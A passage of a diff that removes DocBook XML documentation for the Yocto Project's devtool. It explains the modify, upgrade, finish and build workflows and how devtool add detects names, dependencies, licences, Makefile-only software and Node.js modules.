-                        <emphasis>Finish Your Work With the Recipe</emphasis>:
-                        The <filename>devtool finish</filename> command creates
-                        any patches corresponding to commits in the local
-                        Git repository, moves the new recipe to a more permanent
-                        layer, and then resets the recipe so that the recipe is
-                        built normally rather than from the workspace.
-                        <literallayout class='monospaced'>
-     $ devtool finish <replaceable>recipe layer</replaceable>
-                        </literallayout>
-                        <note>
-                            Any changes you want to turn into patches must be
-                            committed to the Git repository in the source tree.
-                        </note></para>
-
-                        <para>As mentioned, the
-                        <filename>devtool finish</filename> command moves the
-                        final recipe to its permanent layer.
-                        </para>
-
-                        <para>As a final process of the
-                        <filename>devtool finish</filename> command, the state
-                        of the standard layers and the upstream source is
-                        restored so that you can build the recipe from those
-                        areas rather than the workspace.
-                        <note>
-                            You can use the <filename>devtool reset</filename>
-                            command to put things back should you decide you
-                            do not want to proceed with your work.
-                            If you do use this command, realize that the source
-                            tree is preserved.
-                        </note>
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-
-        <section id='sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component'>
-            <title>Use <filename>devtool modify</filename> to Modify the Source of an Existing Component</title>
-
-            <para>
-                The <filename>devtool modify</filename> command prepares the
-                way to work on existing code that already has a local recipe in
-                place that is used to build the software.
-                The command is flexible enough to allow you to extract code
-                from an upstream source, specify the existing recipe, and
-                keep track of and gather any patch files from other developers
-                that are associated with the code.
-            </para>
-
-            <para>
-                Depending on your particular scenario, the arguments and options
-                you use with <filename>devtool modify</filename> form different
-                combinations.
-                The following diagram shows common development flows for the
-                <filename>devtool modify</filename> command:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/sdk-devtool-modify-flow.png" align="center" />
-            </para>
-
-            <para>
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Preparing to Modify the Code</emphasis>:
-                        The top part of the flow shows three scenarios by which
-                        you could use <filename>devtool modify</filename> to
-                        prepare to work on source files.
-                        Each scenario assumes the following:
-                        <itemizedlist>
-                            <listitem><para>
-                                The recipe exists locally in a layer external
-                                to the <filename>devtool</filename> workspace.
-                                </para></listitem>
-                            <listitem><para>
-                                The source files exist either upstream in an
-                                un-extracted state or locally in a previously
-                                extracted state.
-                                </para></listitem>
-                        </itemizedlist>
-                        The typical situation is where another developer has
-                        created a layer for use with the Yocto Project and
-                        their recipe already resides in that layer.
-                        Furthermore, their source code is readily available
-                        either upstream or locally.
-                        <itemizedlist>
-                            <listitem><para>
-                                <emphasis>Left</emphasis>:
-                                The left scenario in the figure represents a
-                                common situation where the source code does
-                                not exist locally and it needs to be extracted
-                                from an upstream source.
-                                In this situation, the source is extracted
-                                into the default <filename>devtool</filename>
-                                workspace location.
-                                The recipe, in this scenario, is in its own
-                                layer outside the workspace
-                                (i.e.
-                                <filename>meta-</filename><replaceable>layername</replaceable>).
-                                </para>
-
-                                <para>The following command identifies the
-                                recipe and, by default, extracts the source
-                                files:
-                                <literallayout class='monospaced'>
-     $ devtool modify <replaceable>recipe</replaceable>
-                                </literallayout>
-                                Once <filename>devtool</filename>locates the
-                                recipe, <filename>devtool</filename> uses the
-                                recipe's
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                                statements to locate the source code and any
-                                local patch files from other developers.</para>
-
-                                <para>With this scenario, no
-                                <replaceable>srctree</replaceable> argument
-                                exists.
-                                Consequently, the default behavior of the
-                                <filename>devtool modify</filename> command is
-                                to extract the source files pointed to by the
-                                <filename>SRC_URI</filename> statements into a
-                                local Git structure.
-                                Furthermore, the location for the extracted
-                                source is the default area within the
-                                <filename>devtool</filename> workspace.
-                                The result is that the command sets up both
-                                the source code and an append file within the
-                                workspace while the recipe remains in its
-                                original location.</para>
-
-                                <para>Additionally, if you have any non-patch
-                                local files (i.e. files referred to with
-                                <filename>file://</filename> entries in
-                                <filename>SRC_URI</filename> statement excluding
-                                <filename>*.patch/</filename> or
-                                <filename>*.diff</filename>), these files are
-                                copied to an
-                                <filename>oe-local-files</filename> folder
-                                under the newly created source tree.
-                                Copying the files here gives you a convenient
-                                area from which you can modify the files.
-                                Any changes or additions you make to those
-                                files are incorporated into the build the next
-                                time you build the software just as are other
-                                changes you might have made to the source.
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis>Middle</emphasis>:
-                                The middle scenario in the figure represents a
-                                situation where the source code also does not
-                                exist locally.
-                                In this case, the code is again upstream
-                                and needs to be extracted to some
-                                local area as a Git repository.
-                                The recipe, in this scenario, is again local
-                                and in its own layer outside the workspace.
-                                </para>
-
-                                <para>The following command tells
-                                <filename>devtool</filename> the recipe with
-                                which to work and, in this case, identifies a
-                                local area for the extracted source files that
-                                exists outside of the default
-                                <filename>devtool</filename> workspace:
-                                <literallayout class='monospaced'>
-     $ devtool modify <replaceable>recipe srctree</replaceable>
-                                </literallayout>
-                                <note>
-                                    You cannot provide a URL for
-                                    <replaceable>srctree</replaceable> using
-                                    the <filename>devtool</filename> command.
-                                </note>
-                                As with all extractions, the command uses
-                                the recipe's <filename>SRC_URI</filename>
-                                statements to locate the source files and any
-                                associated patch files.
-                                Non-patch files are copied to an
-                                <filename>oe-local-files</filename> folder
-                                under the newly created source tree.</para>
-
-                                <para>Once the files are located, the command
-                                by default extracts them into
-                                <replaceable>srctree</replaceable>.</para>
-
-                                <para>Within workspace,
-                                <filename>devtool</filename> creates an append
-                                file for the recipe.
-                                The recipe remains in its original location but
-                                the source files are extracted to the location
-                                you provide with
-                                <replaceable>srctree</replaceable>.
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis>Right</emphasis>:
-                                The right scenario in the figure represents a
-                                situation where the source tree
-                                (<replaceable>srctree</replaceable>) already
-                                exists locally as a previously extracted Git
-                                structure outside of the
-                                <filename>devtool</filename> workspace.
-                                In this example, the recipe also exists
-                                elsewhere locally in its own layer.
-                                </para>
-
-                                <para>The following command tells
-                                <filename>devtool</filename> the recipe
-                                with which to work, uses the "-n" option to
-                                indicate source does not need to be extracted,
-                                and uses <replaceable>srctree</replaceable> to
-                                point to the previously extracted source files:
-                                <literallayout class='monospaced'>
-     $ devtool modify -n <replaceable>recipe srctree</replaceable>
-                                </literallayout>
-                                </para>
-
-                                <para>If an <filename>oe-local-files</filename>
-                                subdirectory happens to exist and it contains
-                                non-patch files, the files are used.
-                                However, if the subdirectory does not exist and
-                                you run the <filename>devtool finish</filename>
-                                command, any non-patch files that might exist
-                                next to the recipe are removed because it
-                                appears to <filename>devtool</filename> that
-                                you have deleted those files.</para>
-
-                                <para>Once the
-                                <filename>devtool modify</filename> command
-                                finishes, it creates only an append file for
-                                the recipe in the <filename>devtool</filename>
-                                workspace.
-                                The recipe and the source code remain in their
-                                original locations.
-                                </para></listitem>
-                            </itemizedlist>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Edit the Source</emphasis>:
-                        Once you have used the
-                        <filename>devtool modify</filename> command, you are
-                        free to make changes to the source files.
-                        You can use any editor you like to make and save
-                        your source code modifications.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the Recipe or Rebuild the Image</emphasis>:
-                        The next step you take depends on what you are going
-                        to do with the new code.</para>
-
-                        <para>If you need to eventually move the build output
-                        to the target hardware, use the following
-                        <filename>devtool</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool build <replaceable>recipe</replaceable>
-                        </literallayout></para>
-
-                        <para>On the other hand, if you want an image to
-                        contain the recipe's packages from the workspace
-                        for immediate deployment onto a device (e.g. for
-                        testing purposes), you can use
-                        the <filename>devtool build-image</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool build-image <replaceable>image</replaceable>
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Deploy the Build Output</emphasis>:
-                        When you use the <filename>devtool build</filename>
-                        command to build out your recipe, you probably want to
-                        see if the resulting build output works as expected
-                        on target hardware.
-                        <note>
-                            This step assumes you have a previously built
-                            image that is already either running in QEMU or
-                            running on actual hardware.
-                            Also, it is assumed that for deployment of the image
-                            to the target, SSH is installed in the image and if
-                            the image is running on real hardware that you have
-                            network access to and from your development machine.
-                        </note>
-                        You can deploy your build output to that target
-                        hardware by using the
-                        <filename>devtool deploy-target</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool deploy-target <replaceable>recipe target</replaceable>
-                        </literallayout>
-                        The <replaceable>target</replaceable> is a live target
-                        machine running as an SSH server.</para>
-
-                        <para>You can, of course, use other methods to deploy
-                        the image you built using the
-                        <filename>devtool build-image</filename> command to
-                        actual hardware.
-                        <filename>devtool</filename> does not provide
-                        a specific command to deploy the image to actual
-                        hardware.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Finish Your Work With the Recipe</emphasis>:
-                        The <filename>devtool finish</filename> command creates
-                        any patches corresponding to commits in the local
-                        Git repository, updates the recipe to point to them
-                        (or creates a <filename>.bbappend</filename> file to do
-                        so, depending on the specified destination layer), and
-                        then resets the recipe so that the recipe is built
-                        normally rather than from the workspace.
-                        <literallayout class='monospaced'>
-     $ devtool finish <replaceable>recipe layer</replaceable>
-                        </literallayout>
-                        <note>
-                            Any changes you want to turn into patches must be
-                            staged and committed within the local Git
-                            repository before you use the
-                            <filename>devtool finish</filename> command.
-                        </note></para>
-
-                        <para>Because there is no need to move the recipe,
-                        <filename>devtool finish</filename> either updates the
-                        original recipe in the original layer or the command
-                        creates a <filename>.bbappend</filename> file in a
-                        different layer as provided by
-                        <replaceable>layer</replaceable>.
-                        Any work you did in the
-                        <filename>oe-local-files</filename> directory is
-                        preserved in the original files next to the recipe
-                        during the <filename>devtool finish</filename>
-                        command.</para>
-
-                        <para>As a final process of the
-                        <filename>devtool finish</filename> command, the state
-                        of the standard layers and the upstream source is
-                        restored so that you can build the recipe from those
-                        areas rather than from the workspace.
-                        <note>
-                            You can use the <filename>devtool reset</filename>
-                            command to put things back should you decide you
-                            do not want to proceed with your work.
-                            If you do use this command, realize that the source
-                            tree is preserved.
-                        </note>
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-
-        <section id='sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software'>
-            <title>Use <filename>devtool upgrade</filename> to Create a Version of the Recipe that Supports a Newer Version of the Software</title>
-
-            <para>
-                The <filename>devtool upgrade</filename> command upgrades
-                an existing recipe to that of a more up-to-date version
-                found upstream.
-                Throughout the life of software, recipes continually undergo
-                version upgrades by their upstream publishers.
-                You can use the <filename>devtool upgrade</filename>
-                workflow to make sure your recipes you are using for builds
-                are up-to-date with their upstream counterparts.
-                <note>
-                    Several methods exist by which you can upgrade recipes -
-                    <filename>devtool upgrade</filename> happens to be one.
-                    You can read about all the methods by which you can
-                    upgrade recipes in the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#gs-upgrading-recipes'>Upgrading Recipes</ulink>"
-                    section of the Yocto Project Development Tasks Manual.
-                </note>
-            </para>
-
-            <para>
-                The <filename>devtool upgrade</filename> command is flexible
-                enough to allow you to specify source code revision and
-                versioning schemes, extract code into or out of the
-                <filename>devtool</filename>
-                <ulink url='&YOCTO_DOCS_REF_URL;#devtool-the-workspace-layer-structure'>workspace</ulink>,
-                and work with any source file forms that the
-                <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetchers</ulink>
-                support.
-            </para>
-
-            <para>
-                The following diagram shows the common development flow
-                used with the <filename>devtool upgrade</filename> command:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/sdk-devtool-upgrade-flow.png" align="center" />
-            </para>
-
-            <para>
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Initiate the Upgrade</emphasis>:
-                        The top part of the flow shows the typical scenario by
-                        which you use the <filename>devtool upgrade</filename>
-                        command.
-                        The following conditions exist:
-                        <itemizedlist>
-                            <listitem><para>
-                                The recipe exists in a local layer external
-                                to the <filename>devtool</filename> workspace.
-                                </para></listitem>
-                            <listitem><para>
-                                The source files for the new release
-                                exist in the same location pointed to by
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                                in the recipe (e.g. a tarball with the new
-                                version number in the name, or as a different
-                                revision in the upstream Git repository).
-                                </para></listitem>
-                        </itemizedlist>
-                        A common situation is where third-party software has
-                        undergone a revision so that it has been upgraded.
-                        The recipe you have access to is likely in your own
-                        layer.
-                        Thus, you need to upgrade the recipe to use the
-                        newer version of the software:
-                        <literallayout class='monospaced'>
-     $ devtool upgrade -V <replaceable>version recipe</replaceable>
-                        </literallayout>
-                        By default, the <filename>devtool upgrade</filename>
-                        command extracts source code into the
-                        <filename>sources</filename> directory in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#devtool-the-workspace-layer-structure'>workspace</ulink>.
-                        If you want the code extracted to any other location,
-                        you need to provide the
-                        <replaceable>srctree</replaceable> positional argument
-                        with the command as follows:
-                        <literallayout class='monospaced'>
-     $ devtool upgrade -V <replaceable>version recipe srctree</replaceable>
-                        </literallayout>
-                        <note>
-                            In this example, the "-V" option specifies the new
-                            version.
-                            If you don't use "-V", the command upgrades the
-                            recipe to the latest version.
-                        </note>
-                        If the source files pointed to by the
-                        <filename>SRC_URI</filename> statement in the recipe
-                        are in a Git repository, you must provide the "-S"
-                        option and specify a revision for the software.</para>
-
-                        <para>Once <filename>devtool</filename> locates the
-                        recipe, it uses the <filename>SRC_URI</filename>
-                        variable to locate the source code and any local patch
-                        files from other developers.
-                        The result is that the command sets up the source
-                        code, the new version of the recipe, and an append file
-                        all within the workspace.</para>
-
-                        <para>Additionally, if you have any non-patch
-                        local files (i.e. files referred to with
-                        <filename>file://</filename> entries in
-                        <filename>SRC_URI</filename> statement excluding
-                        <filename>*.patch/</filename> or
-                        <filename>*.diff</filename>), these files are
-                        copied to an
-                        <filename>oe-local-files</filename> folder
-                        under the newly created source tree.
-                        Copying the files here gives you a convenient
-                        area from which you can modify the files.
-                        Any changes or additions you make to those
-                        files are incorporated into the build the next
-                        time you build the software just as are other
-                        changes you might have made to the source.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Resolve any Conflicts created by the Upgrade</emphasis>:
-                        Conflicts could exist due to the software being
-                        upgraded to a new version.
-                        Conflicts occur if your recipe specifies some patch
-                        files in <filename>SRC_URI</filename> that conflict
-                        with changes made in the new version of the software.
-                        For such cases, you need to resolve the conflicts
-                        by editing the source and following the normal
-                        <filename>git rebase</filename> conflict resolution
-                        process.</para>
-
-                        <para>Before moving onto the next step, be sure to
-                        resolve any such conflicts created through use of a
-                        newer or different version of the software.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the Recipe or Rebuild the Image</emphasis>:
-                        The next step you take depends on what you are going
-                        to do with the new code.</para>
-
-                        <para>If you need to eventually move the build output
-                        to the target hardware, use the following
-                        <filename>devtool</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool build <replaceable>recipe</replaceable>
-                        </literallayout></para>
-
-                        <para>On the other hand, if you want an image to
-                        contain the recipe's packages from the workspace
-                        for immediate deployment onto a device (e.g. for
-                        testing purposes), you can use
-                        the <filename>devtool build-image</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool build-image <replaceable>image</replaceable>
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Deploy the Build Output</emphasis>:
-                        When you use the <filename>devtool build</filename>
-                        command or <filename>bitbake</filename> to build
-                        your recipe, you probably want to see if the resulting
-                        build output works as expected on target hardware.
-                        <note>
-                            This step assumes you have a previously built
-                            image that is already either running in QEMU or
-                            running on actual hardware.
-                            Also, it is assumed that for deployment of the
-                            image to the target, SSH is installed in the image
-                            and if the image is running on real hardware that
-                            you have network access to and from your
-                            development machine.
-                        </note>
-                        You can deploy your build output to that target
-                        hardware by using the
-                        <filename>devtool deploy-target</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool deploy-target <replaceable>recipe target</replaceable>
-                        </literallayout>
-                        The <replaceable>target</replaceable> is a live target
-                        machine running as an SSH server.</para>
-
-                        <para>You can, of course, also deploy the image you
-                        build using the
-                        <filename>devtool build-image</filename> command
-                        to actual hardware.
-                        However, <filename>devtool</filename> does not provide
-                        a specific command that allows you to do this.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Finish Your Work With the Recipe</emphasis>:
-                        The <filename>devtool finish</filename> command creates
-                        any patches corresponding to commits in the local
-                        Git repository, moves the new recipe to a more
-                        permanent layer, and then resets the recipe so that
-                        the recipe is built normally rather than from the
-                        workspace.</para>
-
-                        <para>Any work you did in the
-                        <filename>oe-local-files</filename> directory is
-                        preserved in the original files next to the recipe
-                        during the <filename>devtool finish</filename>
-                        command.</para>
-
-                        <para>
-                        If you specify a destination layer that is the same as
-                        the original source, then the old version of the
-                        recipe and associated files are removed prior to
-                        adding the new version.
-                        <literallayout class='monospaced'>
-     $ devtool finish <replaceable>recipe layer</replaceable>
-                        </literallayout>
-                        <note>
-                            Any changes you want to turn into patches must be
-                            committed to the Git repository in the source tree.
-                        </note></para>
-
-                        <para>As a final process of the
-                        <filename>devtool finish</filename> command, the state
-                        of the standard layers and the upstream source is
-                        restored so that you can build the recipe from those
-                        areas rather than the workspace.
-                        <note>
-                            You can use the <filename>devtool reset</filename>
-                            command to put things back should you decide you
-                            do not want to proceed with your work.
-                            If you do use this command, realize that the source
-                            tree is preserved.
-                        </note>
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='sdk-a-closer-look-at-devtool-add'>
-        <title>A Closer Look at <filename>devtool add</filename></title>
-
-        <para>
-            The <filename>devtool add</filename> command automatically creates
-            a recipe based on the source tree you provide with the command.
-            Currently, the command has support for the following:
-            <itemizedlist>
-                <listitem><para>
-                    Autotools (<filename>autoconf</filename> and
-                    <filename>automake</filename>)
-                    </para></listitem>
-                <listitem><para>
-                    CMake
-                    </para></listitem>
-                <listitem><para>
-                    Scons
-                    </para></listitem>
-                <listitem><para>
-                    <filename>qmake</filename>
-                    </para></listitem>
-                <listitem><para>
-                    Plain <filename>Makefile</filename>
-                    </para></listitem>
-                <listitem><para>
-                    Out-of-tree kernel module
-                    </para></listitem>
-                <listitem><para>
-                    Binary package (i.e. "-b" option)
-                    </para></listitem>
-                <listitem><para>
-                    Node.js module
-                    </para></listitem>
-                <listitem><para>
-                    Python modules that use <filename>setuptools</filename>
-                    or <filename>distutils</filename>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            Apart from binary packages, the determination of how a source tree
-            should be treated is automatic based on the files present within
-            that source tree.
-            For example, if a <filename>CMakeLists.txt</filename> file is found,
-            then the source tree is assumed to be using
-            CMake and is treated accordingly.
-            <note>
-                In most cases, you need to edit the automatically generated
-                recipe in order to make it build properly.
-                Typically, you would go through several edit and build cycles
-                until the recipe successfully builds.
-                Once the recipe builds, you could use possible further
-                iterations to test the recipe on the target device.
-            </note>
-        </para>
-
-        <para>
-            The remainder of this section covers specifics regarding how parts
-            of the recipe are generated.
-        </para>
-
-        <section id='sdk-name-and-version'>
-            <title>Name and Version</title>
-
-            <para>
-                If you do not specify a name and version on the command
-                line, <filename>devtool add</filename> uses various metadata
-                within the source tree in an attempt to determine
-                the name and version of the software being built.
-                Based on what the tool determines, <filename>devtool</filename>
-                sets the name of the created recipe file accordingly.
-            </para>
-
-            <para>
-                If <filename>devtool</filename> cannot determine the name and
-                version, the command prints an error.
-                For such cases, you must re-run the command and provide
-                the name and version, just the name, or just the version as
-                part of the command line.
-            </para>
-
-            <para>
-                Sometimes the name or version determined from the source tree
-                might be incorrect.
-                For such a case, you must reset the recipe:
-                <literallayout class='monospaced'>
-     $ devtool reset -n <replaceable>recipename</replaceable>
-                </literallayout>
-                After running the <filename>devtool reset</filename> command,
-                you need to run <filename>devtool add</filename> again and
-                provide the name or the version.
-            </para>
-        </section>
-
-        <section id='sdk-dependency-detection-and-mapping'>
-            <title>Dependency Detection and Mapping</title>
-
-            <para>
-                The <filename>devtool add</filename> command attempts to
-                detect build-time dependencies and map them to other recipes
-                in the system.
-                During this mapping, the command fills in the names of those
-                recipes as part of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                variable within the recipe.
-                If a dependency cannot be mapped, <filename>devtool</filename>
-                places a comment in the recipe indicating such.
-                The inability to map a dependency can result from naming not
-                being recognized or because the dependency simply is not
-                available.
-                For cases where the dependency is not available, you must use
-                the <filename>devtool add</filename> command to add an
-                additional recipe that satisfies the dependency.
-                Once you add that recipe, you need to update the
-                <filename>DEPENDS</filename> variable in the original recipe
-                to include the new recipe.
-            </para>
-
-            <para>
-                If you need to add runtime dependencies, you can do so by
-                adding the following to your recipe:
-                <literallayout class='monospaced'>
-     RDEPENDS_${PN} += "<replaceable>dependency1 dependency2 ...</replaceable>"
-                </literallayout>
-                <note>
-                    The <filename>devtool add</filename> command often cannot
-                    distinguish between mandatory and optional dependencies.
-                    Consequently, some of the detected dependencies might
-                    in fact be optional.
-                    When in doubt, consult the documentation or the configure
-                    script for the software the recipe is building for further
-                    details.
-                    In some cases, you might find you can substitute the
-                    dependency with an option that disables the associated
-                    functionality passed to the configure script.
-                </note>
-            </para>
-        </section>
-
-        <section id='sdk-license-detection'>
-            <title>License Detection</title>
-
-            <para>
-                The <filename>devtool add</filename> command attempts to
-                determine if the software you are adding is able to be
-                distributed under a common, open-source license.
-                If so, the command sets the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
-                value accordingly.
-                You should double-check the value added by the command against
-                the documentation or source files for the software you are
-                building and, if necessary, update that
-                <filename>LICENSE</filename> value.
-            </para>
-
-            <para>
-                The <filename>devtool add</filename> command also sets the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
-                value to point to all files that appear to be license-related.
-                Realize that license statements often appear in comments at
-                the top of source files or within the documentation.
-                In such cases, the command does not recognize those license
-                statements.
-                Consequently, you might need to amend the
-                <filename>LIC_FILES_CHKSUM</filename> variable to point to one
-                or more of those comments if present.
-                Setting <filename>LIC_FILES_CHKSUM</filename> is particularly
-                important for third-party software.
-                The mechanism attempts to ensure correct licensing should you
-                upgrade the recipe to a newer upstream version in future.
-                Any change in licensing is detected and you receive an error
-                prompting you to check the license text again.
-            </para>
-
-            <para>
-                If the <filename>devtool add</filename> command cannot
-                determine licensing information, <filename>devtool</filename>
-                sets the <filename>LICENSE</filename> value to "CLOSED" and
-                leaves the <filename>LIC_FILES_CHKSUM</filename> value unset.
-                This behavior allows you to continue with development even
-                though the settings are unlikely to be correct in all cases.
-                You should check the documentation or source files for the
-                software you are building to determine the actual license.
-            </para>
-        </section>
-
-        <section id='sdk-adding-makefile-only-software'>
-            <title>Adding Makefile-Only Software</title>
-
-            <para>
-                The use of Make by itself is very common in both proprietary
-                and open-source software.
-                Unfortunately, Makefiles are often not written with
-                cross-compilation in mind.
-                Thus, <filename>devtool add</filename> often cannot do very
-                much to ensure that these Makefiles build correctly.
-                It is very common, for example, to explicitly call
-                <filename>gcc</filename> instead of using the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>
-                variable.
-                Usually, in a cross-compilation environment,
-                <filename>gcc</filename> is the compiler for the build host
-                and the cross-compiler is named something similar to
-                <filename>arm-poky-linux-gnueabi-gcc</filename> and might
-                require arguments (e.g. to point to the associated sysroot
-                for the target machine).
-            </para>
-
-            <para>
-                When writing a recipe for Makefile-only software, keep the
-                following in mind:
-                <itemizedlist>
-                    <listitem><para>
-                        You probably need to patch the Makefile to use
-                        variables instead of hardcoding tools within the
-                        toolchain such as <filename>gcc</filename> and
-                        <filename>g++</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        The environment in which Make runs is set up with
-                        various standard variables for compilation (e.g.
-                        <filename>CC</filename>, <filename>CXX</filename>, and
-                        so forth) in a similar manner to the environment set
-                        up by the SDK's environment setup script.
-                        One easy way to see these variables is to run the
-                        <filename>devtool build</filename> command on the
-                        recipe and then look in
-                        <filename>oe-logs/run.do_compile</filename>.
-                        Towards the top of this file, a list of environment
-                        variables exists that are being set.
-                        You can take advantage of these variables within the
-                        Makefile.
-                        </para></listitem>
-                    <listitem><para>
-                        If the Makefile sets a default for a variable using "=",
-                        that default overrides the value set in the environment,
-                        which is usually not desirable.
-                        For this case, you can either patch the Makefile
-                        so it sets the default using the "?=" operator, or
-                        you can alternatively force the value on the
-                        <filename>make</filename> command line.
-                        To force the value on the command line, add the
-                        variable setting to
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></ulink>
-                        or
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
-                        within the recipe.
-                        Here is an example using <filename>EXTRA_OEMAKE</filename>:
-                        <literallayout class='monospaced'>
-     EXTRA_OEMAKE += "'CC=${CC}' 'CXX=${CXX}'"
-                        </literallayout>
-                        In the above example, single quotes are used around the
-                        variable settings as the values are likely to contain
-                        spaces because required default options are passed to
-                        the compiler.
-                        </para></listitem>
-                    <listitem><para>
-                        Hardcoding paths inside Makefiles is often problematic
-                        in a cross-compilation environment.
-                        This is particularly true because those hardcoded paths
-                        often point to locations on the build host and thus
-                        will either be read-only or will introduce
-                        contamination into the cross-compilation because they
-                        are specific to the build host rather than the target.
-                        Patching the Makefile to use prefix variables or other
-                        path variables is usually the way to handle this
-                        situation.
-                        </para></listitem>
-                    <listitem><para>
-                        Sometimes a Makefile runs target-specific commands such
-                        as <filename>ldconfig</filename>.
-                        For such cases, you might be able to apply patches that
-                        remove these commands from the Makefile.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='sdk-adding-native-tools'>
-            <title>Adding Native Tools</title>
-
-            <para>
-                Often, you need to build additional tools that run on the
-                <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>
-                as opposed to the target.
-                You should indicate this requirement by using one of the
-                following methods when you run
-                <filename>devtool add</filename>:
-                <itemizedlist>
-                    <listitem><para>
-                        Specify the name of the recipe such that it ends
-                        with "-native".
-                        Specifying the name like this produces a recipe that
-                        only builds for the build host.
-                        </para></listitem>
-                    <listitem><para>
-                        Specify the "&dash;&dash;also-native" option with the
-                        <filename>devtool add</filename> command.
-                        Specifying this option creates a recipe file that still
-                        builds for the target but also creates a variant with
-                        a "-native" suffix that builds for the build host.
-                        </para></listitem>
-                </itemizedlist>
-                <note>
-                    If you need to add a tool that is shipped as part of a
-                    source tree that builds code for the target, you can
-                    typically accomplish this by building the native and target
-                    parts separately rather than within the same compilation
-                    process.
-                    Realize though that with the "&dash;&dash;also-native"
-                    option, you can add the tool using just one recipe file.
-                </note>
-            </para>
-        </section>
-
-        <section id='sdk-adding-node-js-modules'>
-            <title>Adding Node.js Modules</title>
-
-            <para>
-                You can use the <filename>devtool add</filename> command two
-                different ways to add Node.js modules: 1) Through
-                <filename>npm</filename> and, 2) from a repository or local
-                source.
-            </para>
-
-            <para>
-                Use the following form to add Node.js modules through
-                <filename>npm</filename>:
-                <literallayout class='monospaced'>
-     $ devtool add "npm://registry.npmjs.org;name=forever;version=0.15.1"
-                </literallayout>
-                The name and version parameters are mandatory.
-                Lockdown and shrinkwrap files are generated and pointed to by
-                the recipe in order to freeze the version that is fetched for
-                the dependencies according to the first time.
-                This also saves checksums that are verified on future fetches.
-                Together, these behaviors ensure the reproducibility and
-                integrity of the build.
-                <note><title>Notes</title>
-                    <itemizedlist>
-                        <listitem><para>
-                            You must use quotes around the URL.
-                            The <filename>devtool add</filename> does not require
-                            the quotes, but the shell considers ";" as a splitter
-                            between multiple commands.
-                            Thus, without the quotes,
-                            <filename>devtool add</filename> does not receive the
-                            other parts, which results in several "command not
-                            found" errors.
-                            </para></listitem>
-                        <listitem><para>
-                            In order to support adding Node.js modules, a
-                            <filename>nodejs</filename> recipe must be part
-                            of your SDK.
-                            </para></listitem>
-                    </itemizedlist>
-                </note>
-            </para>
-
-            <para>
-                As mentioned earlier, you can also add Node.js modules
-                directly from a repository or local source tree.
-                To add modules this way, use <filename>devtool add</filename>
-                in the following form:
-                <literallayout class='monospaced'>
-     $ devtool add https://github.com/diversario/node-ssdp
-                </literallayout>
-                In this example, <filename>devtool</filename> fetches the
-                specified Git repository, detects the code as Node.js
-                code, fetches dependencies using <filename>npm</filename>, and
-                sets
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                accordingly.
-            </para>
-        </section>
-    </section>
-
-    <section id='sdk-working-with-recipes'>
-        <title>Working With Recipes</title>
-
-        <para>
-            When building a recipe using the
-            <filename>devtool build</filename> command, the typical build
-            progresses as follows:
-            <orderedlist>
-                <listitem><para>
-                    Fetch the source
-                    </para></listitem>
-                <listitem><para>
-                    Unpack the source
-                    </para></listitem>
-                <listitem><para>
-                    Configure the source
-                    </para></listitem>
-                <listitem><para>
-                    Compile the source
-                    </para></listitem>
-                <listitem><para>
-                    Install the build output
-                    </para></listitem>
-                <listitem><para>
-                    Package the installed output
-                    </para></listitem>
-            </orderedlist>
-            For recipes in the workspace, fetching and unpacking is disabled
-            as the source tree has already been prepared and is persistent.
-            Each of these build steps is defined as a function (task), usually
-            with a "do_" prefix (e.g.
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>,
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>,
-            and so forth).
-            These functions are typically shell scripts but can instead be
